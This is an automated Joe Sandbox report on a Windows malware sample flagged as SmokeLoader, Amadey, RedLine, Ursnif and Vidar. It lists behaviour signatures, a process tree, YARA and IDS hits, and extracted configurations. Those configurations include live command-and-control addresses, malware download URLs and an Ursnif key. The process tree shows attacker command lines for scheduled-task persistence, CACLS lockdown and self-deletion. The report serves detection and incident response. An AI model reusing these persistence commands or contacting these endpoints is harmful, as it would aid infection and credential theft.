Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
q4Z52wRd28.exe

Overview

General Information

Sample Name:q4Z52wRd28.exe
Analysis ID:749948
MD5:a687e1c326c9f03569bbfef53e21c315
SHA1:1993746a547c67807c1118501e1a7ff9261f7c8b
SHA256:8c2b385622de52145317d9e740b62edfb74260efab3478810d6c87ca41183f74
Tags:exeSmokeLoader
Infos:

Detection

Ursnif, Amadey, RedLine, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Go Stealer
Yara detected Ursnif
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes or reads registry keys via WMI
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Opens the same file many times (likely Sandbox evasion)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Writes registry values via WMI
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges

Classification

  • System is w10x64
  • q4Z52wRd28.exe (PID: 5708 cmdline: C:\Users\user\Desktop\q4Z52wRd28.exe MD5: A687E1C326C9F03569BBFEF53E21C315)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • A852.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\A852.exe MD5: 0E455D9C65E7D53A67C227DCD8D70FB8)
        • rovwer.exe (PID: 4852 cmdline: "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" MD5: 0E455D9C65E7D53A67C227DCD8D70FB8)
          • schtasks.exe (PID: 2384 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6140 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 68 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 2016 cmdline: CACLS "rovwer.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 5168 cmdline: CACLS "rovwer.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cmd.exe (PID: 5444 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 5484 cmdline: CACLS "..\99e342142d" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 5608 cmdline: CACLS "..\99e342142d" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • rundll32.exe (PID: 4964 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • B4A7.exe (PID: 3080 cmdline: C:\Users\user\AppData\Local\Temp\B4A7.exe MD5: F96144B1D5B53D93CAADDDADE38DB5E9)
      • CF35.exe (PID: 4392 cmdline: C:\Users\user\AppData\Local\Temp\CF35.exe MD5: 44A7E13ECC55CE9797C5121B230D9927)
        • RegSvcs.exe (PID: 5128 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe MD5: 59FCE79E9D81AB9E2ED4C3561205F5DF)
      • E35A.exe (PID: 4252 cmdline: C:\Users\user\AppData\Local\Temp\E35A.exe MD5: 19A79DADDFAAC09499E79ADE27E756F8)
      • EB2B.exe (PID: 5512 cmdline: C:\Users\user\AppData\Local\Temp\EB2B.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
        • EB2B.exe (PID: 5628 cmdline: C:\Users\user\AppData\Local\Temp\EB2B.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
          • EB2B.exe (PID: 5828 cmdline: C:\Users\user\AppData\Local\Temp\EB2B.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)
            • cmd.exe (PID: 1852 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • timeout.exe (PID: 5980 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • F771.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\F771.exe MD5: DF920AEBFABB8C4CCCEB4DCEAD922ABD)
      • explorer.exe (PID: 5644 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5656 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 5816 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5876 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 5068 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 3932 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 408 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 4972 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 5248 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • cttgcew (PID: 4220 cmdline: C:\Users\user\AppData\Roaming\cttgcew MD5: A687E1C326C9F03569BBFEF53E21C315)
  • rovwer.exe (PID: 5372 cmdline: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe MD5: 0E455D9C65E7D53A67C227DCD8D70FB8)
  • cleanup
{"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
{"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
{"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
{"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
          • 0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb
          • 0x190dc:$s4: \HostName
          • 0x19104:$s5: \Password
          • 0x17c08:$s6: SOFTWARE\RealVNC\
          • 0x17c34:$s6: SOFTWARE\RealVNC\
          • 0x17c60:$s6: SOFTWARE\RealVNC\
          • 0x17ca8:$s6: SOFTWARE\RealVNC\
          • 0x17cd4:$s6: SOFTWARE\RealVNC\
          • 0x1800c:$s7: SOFTWARE\TightVNC\
          • 0x18038:$s7: SOFTWARE\TightVNC\
          • 0x18064:$s7: SOFTWARE\TightVNC\
          • 0x180b0:$s7: SOFTWARE\TightVNC\
          • 0x1c43c:$s8: cred.dll
          C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
            • 0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
            • 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
            • 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
            • 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            • 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            • 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb
            • 0x190dc:$s4: \HostName
            • 0x19104:$s5: \Password
            • 0x17c08:$s6: SOFTWARE\RealVNC\
            • 0x17c34:$s6: SOFTWARE\RealVNC\
            • 0x17c60:$s6: SOFTWARE\RealVNC\
            • 0x17ca8:$s6: SOFTWARE\RealVNC\
            • 0x17cd4:$s6: SOFTWARE\RealVNC\
            • 0x1800c:$s7: SOFTWARE\TightVNC\
            • 0x18038:$s7: SOFTWARE\TightVNC\
            • 0x18064:$s7: SOFTWARE\TightVNC\
            • 0x180b0:$s7: SOFTWARE\TightVNC\
            • 0x1c43c:$s8: cred.dll
            SourceRuleDescriptionAuthorStrings
            00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
              • 0xff0:$a1: /C ping localhost -n %u && del "%s"
              • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
              • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
              • 0xca8:$a5: filename="%.4u.%lu"
              • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
              • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
              • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
              • 0xe72:$a9: &whoami=%s
              • 0xe5a:$a10: %u.%u_%u_%u_x%u
              • 0xc22:$a11: size=%u&hash=0x%08x
              • 0xc13:$a12: &uptime=%u
              • 0xda7:$a13: %systemroot%\system32\c_1252.nls
              • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
              00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
              • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
              • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
              • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
              • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
              • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
              • 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
              00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
                • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
                Click to see the 97 entries
                SourceRuleDescriptionAuthorStrings
                11.3.cttgcew.870000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  32.3.F771.exe.9c6b90.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    32.3.F771.exe.9c6b90.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x34f0e:$pat14: , CommandLine:
                    • 0x23dd6:$v2_1: ListOfProcesses
                    • 0x2228c:$v4_3: base64str
                    • 0x2224b:$v4_4: stringKey
                    • 0x22296:$v4_5: BytesToStringConverted
                    • 0x22281:$v4_6: FromBase64
                    • 0x23a93:$v4_8: procName
                    • 0x20e54:$v5_1: DownloadAndExecuteUpdate
                    • 0x20e7c:$v5_2: ITaskProcessor
                    • 0x20e42:$v5_3: CommandLineUpdate
                    • 0x20e6d:$v5_4: DownloadUpdate
                    • 0x20db6:$v5_5: FileScanning
                    • 0x21054:$v5_7: RecordHeaderField
                    • 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                    13.3.B4A7.exe.716f68.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      13.3.B4A7.exe.716f68.3.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1f430:$pat14: , CommandLine:
                      • 0x17162:$v2_1: ListOfProcesses
                      • 0x16eed:$v4_3: base64str
                      • 0x17f81:$v4_4: stringKey
                      • 0x14b08:$v4_5: BytesToStringConverted
                      • 0x13b70:$v4_6: FromBase64
                      • 0x152dc:$v4_8: procName
                      • 0x1565f:$v5_1: DownloadAndExecuteUpdate
                      • 0x16dfd:$v5_2: ITaskProcessor
                      • 0x1564d:$v5_3: CommandLineUpdate
                      • 0x1563e:$v5_4: DownloadUpdate
                      • 0x15cf1:$v5_5: FileScanning
                      • 0x14e77:$v5_7: RecordHeaderField
                      • 0x14896:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                      Click to see the 54 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.3193.56.146.17449747802027700 11/19/22-16:58:50.225468
                      SID:2027700
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449753802027700 11/19/22-16:58:52.314328
                      SID:2027700
                      Source Port:49753
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449744802027700 11/19/22-16:58:49.534930
                      SID:2027700
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449746802027700 11/19/22-16:58:49.809680
                      SID:2027700
                      Source Port:49746
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.377.232.37.22849727802851815 11/19/22-16:58:32.473174
                      SID:2851815
                      Source Port:49727
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.377.232.37.22849736802851815 11/19/22-16:58:36.653112
                      SID:2851815
                      Source Port:49736
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449752802027700 11/19/22-16:58:52.037330
                      SID:2027700
                      Source Port:49752
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449748802027700 11/19/22-16:58:50.604993
                      SID:2027700
                      Source Port:49748
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449751802027700 11/19/22-16:58:51.692909
                      SID:2027700
                      Source Port:49751
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449749802027700 11/19/22-16:58:51.029782
                      SID:2027700
                      Source Port:49749
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449750802027700 11/19/22-16:58:51.366139
                      SID:2027700
                      Source Port:49750
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.377.232.37.22849730802851815 11/19/22-16:58:34.840324
                      SID:2851815
                      Source Port:49730
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.3193.56.146.17449745802027700 11/19/22-16:58:49.249164
                      SID:2027700
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://116.202.5.101/446391140202.zipAvira URL Cloud: Label: malware
                      Source: http://193.56.146.168/mia/solt.exeAvira URL Cloud: Label: malware
                      Source: http://116.202.5.101:80Avira URL Cloud: Label: malware
                      Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1Avira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                      Source: q4Z52wRd28.exeVirustotal: Detection: 31%Perma Link
                      Source: o36fafs3sn6xou.comVirustotal: Detection: 15%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllReversingLabs: Detection: 88%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllMetadefender: Detection: 71%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeReversingLabs: Detection: 20%
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeReversingLabs: Detection: 23%
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeReversingLabs: Detection: 38%
                      Source: C:\Users\user\AppData\Local\Temp\EB2B.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllReversingLabs: Detection: 88%
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllMetadefender: Detection: 71%Perma Link
                      Source: C:\Users\user\AppData\Roaming\cttgcewReversingLabs: Detection: 26%
                      Source: q4Z52wRd28.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\cttgcewJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\B4A7.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\CF35.exeJoe Sandbox ML: detected
                      Source: 24.3.E35A.exe.880000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 24.2.E35A.exe.870e67.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 24.2.E35A.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                      Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
                      Source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
                      Source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
                      Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

                      Compliance

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeUnpacked PE file: 12.2.A852.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 14.2.rovwer.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeUnpacked PE file: 24.2.E35A.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeUnpacked PE file: 26.2.rovwer.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\F771.exeUnpacked PE file: 32.2.F771.exe.400000.0.unpack
                      Source: q4Z52wRd28.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 131.253.33.200:443 -> 192.168.2.3:49699 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49703 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49729 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.5.21.195:443 -> 192.168.2.3:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.160.13:443 -> 192.168.2.3:49906 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49930 version: TLS 1.2
                      Source: Binary string: C:\wide-ponicomonodido52\cepoh.pdb source: q4Z52wRd28.exe, cttgcew.1.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: A852.exe, A852.exe, 0000000C.00000002.423113351.0000000000400000.00000040.00000001.01000000.00000009.sdmp, A852.exe, 0000000C.00000003.416658958.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000003.432928807.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000002.773732313.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, rovwer.exe, 0000001A.00000002.578955706.0000000000400000.00000040.00000001.01000000.0000000B.sdmp
                      Source: Binary string: DC:\giroyid.pdb source: A852.exe, 0000000C.00000000.410237747.0000000000401000.00000020.00000001.01000000.00000009.sdmp, rovwer.exe, 0000000E.00000000.421565865.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000001A.00000000.445061282.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe.12.dr, A852.exe.1.dr
